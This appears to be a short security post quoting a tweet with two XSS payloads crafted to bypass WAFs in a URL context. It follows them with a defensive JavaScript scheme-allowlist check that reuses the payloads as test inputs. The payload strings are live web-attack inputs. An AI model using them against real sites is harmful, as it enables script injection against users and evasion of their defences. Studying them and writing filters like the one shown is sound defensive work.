A tweet by @BRuteLogic highlights an XSS bypass payload that can be used in a URL context. The payload is JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>". This payload can potentially bypass various WAFs. Security professionals should be aware of such payloads and ensure that proper protection measures are in place to mitigate XSS vulnerabilities in web applications.
Always look everything: payloads to bypass WAF in URL context, by @BRuteLogic
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"
JavaScript:"%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
#xss #cybersecurity #BugBounty #pentest #Coding https://t.co/zhBgJ5Hqe3
— Seke4l (@seke4l) December 8, 2024
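
A defender-side check for the URL context these payloads target, as an added example that is not from the tweet or its author: rather than pattern-matching the raw string, parse the value and allowlist its scheme. The names safeHref, naiveIsSafe and report, the allowed schemes and the base origin https://app.example/ are assumptions for illustration.

```javascript
// Added example (not from the tweet): scheme allowlist for untrusted URL values.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]); // assumed policy
const BASE = "https://app.example/"; // assumed application origin (placeholder)

// The two payload strings quoted on this page, used here as test inputs.
const PAGE_SAMPLES = [
  'JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"',
  'JavaScript:"%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"',
];

// Weak check: a case-sensitive string match on the raw value.
// The mixed-case "JavaScript:" prefix on this page passes it.
function naiveIsSafe(untrusted) {
  return !untrusted.startsWith("javascript:");
}

// Stronger check: parse first, then decide on the normalized scheme.
// The URL parser lowercases the scheme, so "JavaScript:" becomes "javascript:".
// Returns the normalized URL string, or null when the value must be rejected.
function safeHref(untrusted) {
  if (typeof untrusted !== "string") return null;
  let parsed;
  try {
    parsed = new URL(untrusted, BASE); // relative values resolve against BASE
  } catch {
    return null; // unparseable input is rejected, not passed through
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Runs both checks over the page's samples so the difference is visible.
function report() {
  return PAGE_SAMPLES.map((s) => ({ naive: naiveIsSafe(s), href: safeHref(s) }));
}

console.log(report());
```

This covers only the scheme decision; the returned value still needs context-appropriate output encoding when it is written into an attribute.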